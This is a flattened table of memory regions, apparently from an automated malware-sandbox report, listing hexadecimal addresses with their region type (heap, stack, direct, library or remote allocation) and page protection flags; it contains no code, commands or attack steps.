unkown
|
page readonly
|
||
85C4000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
5682000
|
trusted library allocation
|
page read and write
|
||
1E3661F7000
|
heap
|
page read and write
|
||
54B0000
|
direct allocation
|
page execute and read and write
|
||
4620000
|
heap
|
page read and write
|
||
140000000
|
unkown
|
page read and write
|
||
D13000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
1F13000
|
heap
|
page read and write
|
||
336E000
|
stack
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
568D000
|
trusted library allocation
|
page read and write
|
||
44EE000
|
stack
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
CF7000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1E36588A000
|
heap
|
page read and write
|
||
61A000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
5683000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1FE60C40000
|
heap
|
page read and write
|
||
284E000
|
stack
|
page read and write
|
||
7FF6BD9D0000
|
unkown
|
page readonly
|
||
56B9000
|
trusted library allocation
|
page read and write
|
||
1E36583D000
|
heap
|
page read and write
|
||
366F000
|
stack
|
page read and write
|
||
564E000
|
stack
|
page read and write
|
||
D90000
|
heap
|
page read and write
|
||
7BD2000
|
direct allocation
|
page read and write
|
||
17C8000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
1FDEBBB0000
|
heap
|
page read and write
|
||
793E000
|
stack
|
page read and write
|
||
3064000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
DD9000
|
unkown
|
page execute and write copy
|
||
56C5000
|
trusted library allocation
|
page read and write
|
||
7FF6BD9D1000
|
unkown
|
page execute read
|
||
7011000
|
heap
|
page read and write
|
||
1FE60C60000
|
heap
|
page read and write
|
||
4AA0000
|
direct allocation
|
page read and write
|
||
4C90000
|
direct allocation
|
page execute and read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
2681099A000
|
heap
|
page read and write
|
||
448000
|
unkown
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
50CE000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
2032D770000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
4BDF000
|
stack
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
562F000
|
stack
|
page read and write
|
||
3F7000
|
unkown
|
page execute and write copy
|
||
4B01000
|
direct allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1E3658C2000
|
heap
|
page read and write
|
||
3D8E000
|
stack
|
page read and write
|
||
D90000
|
heap
|
page read and write
|
||
7780000
|
direct allocation
|
page execute and read and write
|
||
5686000
|
trusted library allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
2032D720000
|
heap
|
page read and write
|
||
1026000
|
unkown
|
page write copy
|
||
5668000
|
trusted library allocation
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
34B000
|
unkown
|
page execute and read and write
|
||
337000
|
unkown
|
page execute and read and write
|
||
30AF000
|
stack
|
page read and write
|
||
8BEC000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
42E000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
5845000
|
trusted library allocation
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
1D90FD80000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
3D0000
|
unkown
|
page read and write
|
||
4C20000
|
direct allocation
|
page execute and read and write
|
||
46F0000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
1EA2D0F0000
|
heap
|
page read and write
|
||
79581FF000
|
stack
|
page read and write
|
||
4C20000
|
direct allocation
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
DA8000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
628F000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
5A266FF000
|
unkown
|
page read and write
|
||
3D1000
|
unkown
|
page execute and read and write
|
||
448000
|
unkown
|
page execute and read and write
|
||
421E000
|
stack
|
page read and write
|
||
26812225000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4C40000
|
direct allocation
|
page execute and read and write
|
||
56D6000
|
trusted library allocation
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
4CD0000
|
direct allocation
|
page execute and read and write
|
||
20E0000
|
trusted library allocation
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
38000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
5A2667C000
|
stack
|
page read and write
|
||
1FE000
|
unkown
|
page read and write
|
||
1500000
|
heap
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
45616FC000
|
stack
|
page read and write
|
||
5674000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1C9000
|
stack
|
page read and write
|
||
8F0000
|
heap
|
page read and write
|
||
5686000
|
trusted library allocation
|
page read and write
|
||
544C000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7FF68FAFA000
|
unkown
|
page write copy
|
||
7011000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
1AB4A180000
|
direct allocation
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
17BE000
|
heap
|
page read and write
|
||
20B4000
|
trusted library allocation
|
page read and write
|
||
5722000
|
trusted library allocation
|
page read and write
|
||
698E000
|
stack
|
page read and write
|
||
22FE000
|
stack
|
page read and write
|
||
4CF0000
|
direct allocation
|
page execute and read and write
|
||
26810965000
|
heap
|
page read and write
|
||
248C0635000
|
heap
|
page read and write
|
||
1BB000
|
unkown
|
page execute and write copy
|
||
7011000
|
heap
|
page read and write
|
||
D9D000
|
heap
|
page read and write
|
||
1D5669C0000
|
heap
|
page read and write
|
||
15F8000
|
heap
|
page read and write
|
||
5761000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
569A000
|
trusted library allocation
|
page read and write
|
||
5664000
|
trusted library allocation
|
page read and write
|
||
CEC000
|
unkown
|
page write copy
|
||
4CBF000
|
stack
|
page read and write
|
||
7FF6BDA61000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
56B1000
|
trusted library allocation
|
page read and write
|
||
17BD000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
6B7000
|
unkown
|
page execute and read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2A4F000
|
stack
|
page read and write
|
||
D8A000
|
heap
|
page read and write
|
||
EA0000
|
heap
|
page read and write
|
||
431F000
|
stack
|
page read and write
|
||
7740000
|
direct allocation
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
7FC000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1406B6000
|
unkown
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
478F000
|
stack
|
page read and write
|
||
CBC000
|
unkown
|
page execute and write copy
|
||
346F000
|
stack
|
page read and write
|
||
35F000
|
unkown
|
page execute and read and write
|
||
268125BD000
|
heap
|
page read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
CB9000
|
unkown
|
page execute and read and write
|
||
268109DD000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
26810962000
|
heap
|
page read and write
|
||
7FF6BD9D1000
|
unkown
|
page execute read
|
||
110E000
|
stack
|
page read and write
|
||
1868D9B0000
|
heap
|
page read and write
|
||
4AA0000
|
direct allocation
|
page read and write
|
||
56D0000
|
trusted library allocation
|
page read and write
|
||
41E000
|
unkown
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
5691000
|
trusted library allocation
|
page read and write
|
||
20A0000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
3D0000
|
unkown
|
page readonly
|
||
F4E000
|
heap
|
page read and write
|
||
1FE60CA0000
|
heap
|
page read and write
|
||
1E365891000
|
heap
|
page read and write
|
||
5200000
|
remote allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
56D6000
|
trusted library allocation
|
page read and write
|
||
3BDE000
|
stack
|
page read and write
|
||
2700000
|
direct allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7FF71271D000
|
unkown
|
page execute and read and write
|
||
B5B000
|
unkown
|
page execute and write copy
|
||
DFD000
|
unkown
|
page execute and read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
1FDEBB70000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
56CB000
|
trusted library allocation
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
8BAC000
|
stack
|
page read and write
|
||
1397000
|
unkown
|
page execute and read and write
|
||
D88000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
6CFE000
|
stack
|
page read and write
|
||
164B000
|
unkown
|
page execute and write copy
|
||
1670000
|
direct allocation
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
17F0000
|
direct allocation
|
page read and write
|
||
1D94EEF0000
|
heap
|
page read and write
|
||
1E365823000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
D22000
|
unkown
|
page execute and read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4D00000
|
direct allocation
|
page execute and read and write
|
||
3F7000
|
unkown
|
page execute and write copy
|
||
D97000
|
unkown
|
page execute and write copy
|
||
7FF68FAE9000
|
unkown
|
page readonly
|
||
13A0000
|
heap
|
page read and write
|
||
4700000
|
trusted library allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
140001000
|
unkown
|
page execute read
|
||
584D000
|
trusted library allocation
|
page read and write
|
||
1E36583E000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
A3E7523000
|
stack
|
page read and write
|
||
360E000
|
stack
|
page read and write
|
||
5450000
|
direct allocation
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
3BA000
|
unkown
|
page execute and write copy
|
||
423000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
D13000
|
heap
|
page read and write
|
||
268109DE000
|
heap
|
page read and write
|
||
36E000
|
unkown
|
page execute and write copy
|
||
1011000
|
unkown
|
page readonly
|
||
610000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
B70000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
3A2000
|
unkown
|
page execute and write copy
|
||
56D4000
|
trusted library allocation
|
page read and write
|
||
975000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
1E365D40000
|
trusted library allocation
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
460000
|
unkown
|
page execute and write copy
|
||
1EC7000
|
heap
|
page read and write
|
||
7FF68FAE9000
|
unkown
|
page readonly
|
||
56FA000
|
trusted library allocation
|
page read and write
|
||
5661000
|
trusted library allocation
|
page read and write
|
||
D90000
|
heap
|
page read and write
|
||
D93000
|
heap
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
1480000
|
heap
|
page read and write
|
||
D42000
|
unkown
|
page execute and write copy
|
||
567C000
|
trusted library allocation
|
page read and write
|
||
16B70430000
|
heap
|
page read and write
|
||
D8A000
|
heap
|
page read and write
|
||
1C7000
|
unkown
|
page execute and write copy
|
||
567B000
|
trusted library allocation
|
page read and write
|
||
3B2000
|
unkown
|
page execute and read and write
|
||
4D20000
|
direct allocation
|
page execute and read and write
|
||
D5A000
|
unkown
|
page execute and write copy
|
||
531E000
|
stack
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
1E3657F4000
|
heap
|
page read and write
|
||
1E36585B000
|
heap
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
268109D1000
|
heap
|
page read and write
|
||
355F000
|
stack
|
page read and write
|
||
1D94EF35000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
3A2000
|
unkown
|
page execute and write copy
|
||
5699000
|
trusted library allocation
|
page read and write
|
||
102F000
|
stack
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
1E3658C4000
|
heap
|
page read and write
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
567D000
|
trusted library allocation
|
page read and write
|
||
42A000
|
heap
|
page read and write
|
||
1AB4A160000
|
heap
|
page read and write
|
||
125E000
|
stack
|
page read and write
|
||
670F000
|
stack
|
page read and write
|
||
A3E7CFF000
|
stack
|
page read and write
|
||
57E1000
|
heap
|
page read and write
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
17A2000
|
heap
|
page read and write
|
||
3AAE000
|
stack
|
page read and write
|
||
3C0F000
|
stack
|
page read and write
|
||
77A0000
|
direct allocation
|
page execute and read and write
|
||
6DFE000
|
stack
|
page read and write
|
||
26810961000
|
heap
|
page read and write
|
||
781F000
|
heap
|
page read and write
|
||
3D1000
|
unkown
|
page execute and write copy
|
||
5698000
|
trusted library allocation
|
page read and write
|
||
20454AD0000
|
heap
|
page read and write
|
||
1E365670000
|
heap
|
page read and write
|
||
5450000
|
direct allocation
|
page execute and read and write
|
||
141000
|
unkown
|
page execute read
|
||
4E61000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
14042C000
|
unkown
|
page read and write
|
||
DFF000
|
unkown
|
page execute and read and write
|
||
D35000
|
unkown
|
page execute and write copy
|
||
1484000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
34B000
|
unkown
|
page execute and read and write
|
||
572A000
|
trusted library allocation
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
435E000
|
stack
|
page read and write
|
||
7FF71271F000
|
unkown
|
page write copy
|
||
40DE000
|
stack
|
page read and write
|
||
45D000
|
unkown
|
page execute and write copy
|
||
46F1000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
3FB000
|
unkown
|
page execute and read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
9E15EFC000
|
stack
|
page read and write
|
||
47AF8FE000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
352F000
|
stack
|
page read and write
|
||
1690000
|
heap
|
page read and write
|
||
7FF69F4C8000
|
unkown
|
page execute and read and write
|
||
2F1000
|
unkown
|
page readonly
|
||
D5E000
|
heap
|
page read and write
|
||
1D911870000
|
heap
|
page read and write
|
||
1F27000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
15A9000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1E60000
|
direct allocation
|
page execute and read and write
|
||
4601000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
1697000
|
heap
|
page read and write
|
||
6C00000
|
heap
|
page read and write
|
||
1FE60C30000
|
heap
|
page read and write
|
||
56E8000
|
trusted library allocation
|
page read and write
|
||
4ADC000
|
stack
|
page read and write
|
||
20454AF0000
|
heap
|
page read and write
|
||
DAA000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
56A7000
|
trusted library allocation
|
page read and write
|
||
558D000
|
stack
|
page read and write
|
||
1170000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
5678000
|
trusted library allocation
|
page read and write
|
||
13F0000
|
heap
|
page read and write
|
||
46DF000
|
stack
|
page read and write
|
||
414E000
|
stack
|
page read and write
|
||
3D9000
|
unkown
|
page execute and write copy
|
||
4E61000
|
heap
|
page read and write
|
||
686000
|
unkown
|
page execute and read and write
|
||
133A000
|
stack
|
page read and write
|
||
1C7000
|
unkown
|
page execute and write copy
|
||
30D000
|
unkown
|
page readonly
|
||
5678000
|
trusted library allocation
|
page read and write
|
||
85C0000
|
heap
|
page read and write
|
||
26810963000
|
heap
|
page read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
4B80000
|
direct allocation
|
page read and write
|
||
CCA000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
2032F010000
|
direct allocation
|
page read and write
|
||
5662000
|
trusted library allocation
|
page read and write
|
||
1700000
|
direct allocation
|
page readonly
|
||
C34000
|
heap
|
page read and write
|
||
EBA000
|
stack
|
page read and write
|
||
248C0580000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
3E1F000
|
stack
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
3B9F000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1F25000
|
heap
|
page read and write
|
||
148F000
|
unkown
|
page execute and write copy
|
||
C34000
|
heap
|
page read and write
|
||
CD6000
|
unkown
|
page execute and write copy
|
||
1E365822000
|
heap
|
page read and write
|
||
D8A000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1288000
|
unkown
|
page execute and read and write
|
||
B67000
|
unkown
|
page execute and write copy
|
||
4601000
|
heap
|
page read and write
|
||
2E68000
|
direct allocation
|
page execute read
|
||
449000
|
unkown
|
page execute and write copy
|
||
680000
|
heap
|
page read and write
|
||
56C9000
|
trusted library allocation
|
page read and write
|
||
143E000
|
stack
|
page read and write
|
||
391F000
|
stack
|
page read and write
|
||
471E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4CD0000
|
direct allocation
|
page execute and read and write
|
||
1626000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
5AFC000
|
direct allocation
|
page read and write
|
||
17CF000
|
heap
|
page read and write
|
||
17CF000
|
heap
|
page read and write
|
||
4FBD000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1E36582D000
|
heap
|
page read and write
|
||
1FB3D270000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
C8C000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
5694000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7FF68FAE9000
|
unkown
|
page readonly
|
||
46E0000
|
direct allocation
|
page read and write
|
||
7BC0000
|
heap
|
page read and write
|
||
5699000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
56AD000
|
trusted library allocation
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
4601000
|
heap
|
page read and write
|
||
1B778368000
|
heap
|
page read and write
|
||
20B3000
|
trusted library allocation
|
page execute and read and write
|
||
6200000
|
direct allocation
|
page read and write
|
||
1E36582F000
|
heap
|
page read and write
|
||
1E365837000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
4CA0000
|
direct allocation
|
page execute and read and write
|
||
67E6000
|
heap
|
page read and write
|
||
2FCE000
|
stack
|
page read and write
|
||
15CC000
|
heap
|
page read and write
|
||
7FF6BDA5D000
|
unkown
|
page write copy
|
||
2BEE000
|
stack
|
page read and write
|
||
2F1000
|
unkown
|
page readonly
|
||
D4C000
|
heap
|
page read and write
|
||
B18190D000
|
stack
|
page read and write
|
||
DB4C3FF000
|
stack
|
page read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
AF1000
|
unkown
|
page execute and write copy
|
||
C20000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
12FC000
|
stack
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
26810994000
|
heap
|
page read and write
|
||
44D000
|
unkown
|
page execute and read and write
|
||
41E000
|
unkown
|
page write copy
|
||
1D54000
|
heap
|
page read and write
|
||
1D94D570000
|
heap
|
page read and write
|
||
D94000
|
heap
|
page read and write
|
||
45617FE000
|
stack
|
page read and write
|
||
462000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
26810976000
|
heap
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
1589000
|
heap
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
DBB000
|
stack
|
page read and write
|
||
374E000
|
stack
|
page read and write
|
||
447000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1868F3E5000
|
heap
|
page read and write
|
||
D2A000
|
heap
|
page read and write
|
||
456177D000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
530E000
|
stack
|
page read and write
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
2AAE000
|
stack
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
1FB3D2AD000
|
heap
|
page read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1F13000
|
heap
|
page read and write
|
||
566F000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
127C000
|
stack
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
1D50000
|
heap
|
page read and write
|
||
1108000
|
unkown
|
page execute and read and write
|
||
1E3E000
|
stack
|
page read and write
|
||
356E000
|
stack
|
page read and write
|
||
F7C000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
CEC000
|
unkown
|
page write copy
|
||
268109D5000
|
heap
|
page read and write
|
||
56A7000
|
trusted library allocation
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7957FFE000
|
stack
|
page read and write
|
||
4F7D000
|
stack
|
page read and write
|
||
5701000
|
trusted library allocation
|
page read and write
|
||
49AF000
|
stack
|
page read and write
|
||
423000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
410F000
|
stack
|
page read and write
|
||
47AF7FE000
|
stack
|
page read and write
|
||
1D566AA8000
|
heap
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
1E36582B000
|
heap
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
26810996000
|
heap
|
page read and write
|
||
567F000
|
trusted library allocation
|
page read and write
|
||
BDE000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1103000
|
unkown
|
page execute and read and write
|
||
1760000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
3D8000
|
unkown
|
page execute and read and write
|
||
5440000
|
direct allocation
|
page execute and read and write
|
||
1476000
|
heap
|
page read and write
|
||
B5B000
|
unkown
|
page execute and read and write
|
||
4601000
|
heap
|
page read and write
|
||
56B9000
|
trusted library allocation
|
page read and write
|
||
17C5000
|
heap
|
page read and write
|
||
56AC000
|
trusted library allocation
|
page read and write
|
||
5200000
|
remote allocation
|
page read and write
|
||
2743F855000
|
heap
|
page read and write
|
||
202A90A0000
|
heap
|
page read and write
|
||
56F9000
|
trusted library allocation
|
page read and write
|
||
48B0000
|
heap
|
page read and write
|
||
4F0F000
|
stack
|
page read and write
|
||
422000
|
unkown
|
page write copy
|
||
1611000
|
heap
|
page read and write
|
||
476527C000
|
stack
|
page read and write
|
||
3FEE000
|
stack
|
page read and write
|
||
3321000
|
trusted library allocation
|
page read and write
|
||
20DA000
|
trusted library allocation
|
page execute and read and write
|
||
4A0E000
|
stack
|
page read and write
|
||
7720000
|
direct allocation
|
page execute and read and write
|
||
1E40000
|
direct allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
A3E7DFF000
|
stack
|
page read and write
|
||
1B9000
|
unkown
|
page write copy
|
||
140001000
|
unkown
|
page execute read
|
||
C81000
|
unkown
|
page execute read
|
||
5420000
|
direct allocation
|
page execute and read and write
|
||
2800000
|
direct allocation
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
1E40000
|
direct allocation
|
page read and write
|
||
1E36582D000
|
heap
|
page read and write
|
||
61E000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
1290000
|
heap
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
5693000
|
trusted library allocation
|
page read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
673E000
|
stack
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1E36584F000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
248C039E000
|
heap
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
1868F3E0000
|
heap
|
page read and write
|
||
1E365DB0000
|
remote allocation
|
page read and write
|
||
447000
|
unkown
|
page execute and write copy
|
||
6E0E000
|
stack
|
page read and write
|
||
7770000
|
direct allocation
|
page execute and read and write
|
||
A3C000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
47C0000
|
trusted library allocation
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
17CF000
|
heap
|
page read and write
|
||
344000
|
unkown
|
page execute and write copy
|
||
412E000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
56FA000
|
trusted library allocation
|
page read and write
|
||
5662000
|
trusted library allocation
|
page read and write
|
||
5669000
|
trusted library allocation
|
page read and write
|
||
248C0380000
|
heap
|
page read and write
|
||
7FF6BDA40000
|
unkown
|
page readonly
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
2032F0B0000
|
heap
|
page read and write
|
||
5699000
|
trusted library allocation
|
page read and write
|
||
4C40000
|
direct allocation
|
page execute and read and write
|
||
15D0000
|
heap
|
page read and write
|
||
1770000
|
remote allocation
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
57A5000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
20E7000
|
trusted library allocation
|
page execute and read and write
|
||
202A9225000
|
heap
|
page read and write
|
||
2F6F000
|
stack
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
D77000
|
unkown
|
page execute and write copy
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
1F25000
|
heap
|
page read and write
|
||
554E000
|
stack
|
page read and write
|
||
1756000
|
heap
|
page read and write
|
||
5F095FE000
|
stack
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
2A1000
|
unkown
|
page execute read
|
||
5698000
|
trusted library allocation
|
page read and write
|
||
566C000
|
trusted library allocation
|
page read and write
|
||
BE5000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1B9000
|
unkown
|
page read and write
|
||
215E000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
2A0F000
|
stack
|
page read and write
|
||
268109D5000
|
heap
|
page read and write
|
||
5B3C000
|
stack
|
page read and write
|
||
7750000
|
direct allocation
|
page execute and read and write
|
||
1E36581F000
|
heap
|
page read and write
|
||
64CF000
|
stack
|
page read and write
|
||
FF0000
|
heap
|
page read and write
|
||
A3E79FE000
|
stack
|
page read and write
|
||
4A40000
|
heap
|
page read and write
|
||
460F000
|
stack
|
page read and write
|
||
2032F0B5000
|
heap
|
page read and write
|
||
3AEE000
|
stack
|
page read and write
|
||
56E8000
|
trusted library allocation
|
page read and write
|
||
4BDF000
|
stack
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
4BBC000
|
stack
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
151000
|
unkown
|
page execute and write copy
|
||
2032F1C0000
|
direct allocation
|
page read and write
|
||
17E2000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
395E000
|
stack
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
